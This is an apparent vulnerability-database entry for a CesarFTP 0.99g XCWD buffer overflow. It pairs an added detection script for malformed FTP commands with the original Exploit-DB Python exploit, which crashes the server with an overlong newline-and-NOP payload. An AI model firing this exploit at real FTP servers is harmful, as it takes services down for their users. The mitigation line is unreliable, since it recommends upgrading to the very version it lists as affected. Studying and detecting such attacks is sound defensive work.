Vendor: CesarFTP
By: Irving Aguilar
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS)
CWE: 119
Product Name: CesarFTP
Affected Version From: 0.99g
Affected Version To: 0.99g
Patch Exists: YES
Related CWE: N/A
CPE: a:cesarftp:cesarftp:0.99g
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3 x86 es
2016

CesarFTP 0.99g - (XCWD) Remote BoF Exploit

Irving Aguilar discovered a buffer overflow vulnerability in CesarFTP 0.99g. By sending a specially crafted XCWD command with 667 newline characters followed by 20 NOPs, a remote attacker can cause a denial of service condition on the vulnerable server.

Mitigation:

Upgrade to the latest version of CesarFTP 0.99g or later.
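
Detection check for the request shape described above, as an added example (not part of the original advisory or the Exploit-DB entry): it scans reassembled client-to-server FTP control data and flags command lines that are over-long, contain runs of bare LF, or carry bytes that are not valid UTF-8. The thresholds, function names and sample captures are assumptions constructed for illustration.

```python
import re

# Thresholds are assumptions for illustration; tune them to your own traffic.
MAX_LINE_LEN = 512        # bytes allowed in one CRLF-terminated command line
MAX_BARE_LF_RUN = 4       # consecutive LF bytes tolerated inside one line

# A run of LF bytes longer than the tolerated maximum, not part of a CRLF.
BARE_LF_RUN = re.compile(rb"(?<!\r)\n{%d,}" % (MAX_BARE_LF_RUN + 1))


def inspect_line(line: bytes) -> list:
    """Return the reasons one client command line looks malformed."""
    reasons = []
    if len(line) > MAX_LINE_LEN:
        reasons.append("length %d > %d" % (len(line), MAX_LINE_LEN))
    runs = BARE_LF_RUN.findall(line)
    if runs:
        reasons.append("bare-LF run of %d" % max(len(r) for r in runs))
    try:
        line.decode("utf-8")      # RFC 2640 pathnames are UTF-8
    except UnicodeDecodeError:
        reasons.append("non-UTF-8 bytes in argument")
    return reasons


def inspect_control_stream(data: bytes) -> list:
    """Scan reassembled client-to-server control data; return (verb, reasons)."""
    findings = []
    for line in data.split(b"\r\n"):
        reasons = inspect_line(line)
        if reasons:
            verb = line.split(b" ", 1)[0][:8].decode("ascii", "replace").upper()
            findings.append((verb, reasons))
    return findings


# Constructed sample captures (not real traffic).
BENIGN = b"USER ftp\r\nPASS ftp\r\nXCWD /pub/docs\r\n"
# Same shape as the request described in the advisory text above.
MALFORMED = b"USER ftp\r\nPASS ftp\r\nXCWD " + b"\n" * 667 + b"\x90" * 20 + b"\r\n"

if __name__ == "__main__":
    for name, capture in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, inspect_control_stream(capture))
```

The same three conditions can be expressed as an IDS rule or a proxy filter in front of a server that cannot be upgraded immediately.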

Exploit-DB raw data:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title     	: CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by  	    	: Irving Aguilar
# Email			: im.aguilar@protonmail.ch
# Discovery Date    	: 18.01.2016
# Tested Version    	: 0.99g
# Vulnerability Type  : Denial of Service (DoS)
# Tested on OS      	: Windows XP Professional SP3 x86 es

import socket


buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)

s.send('USER ftp\r\n')
s.recv(1024)

s.send('PASS ftp\r\n')
s.recv(1024)

s.send( buffer  + '\r\n')
print '[+] Buffer sent'
s.close()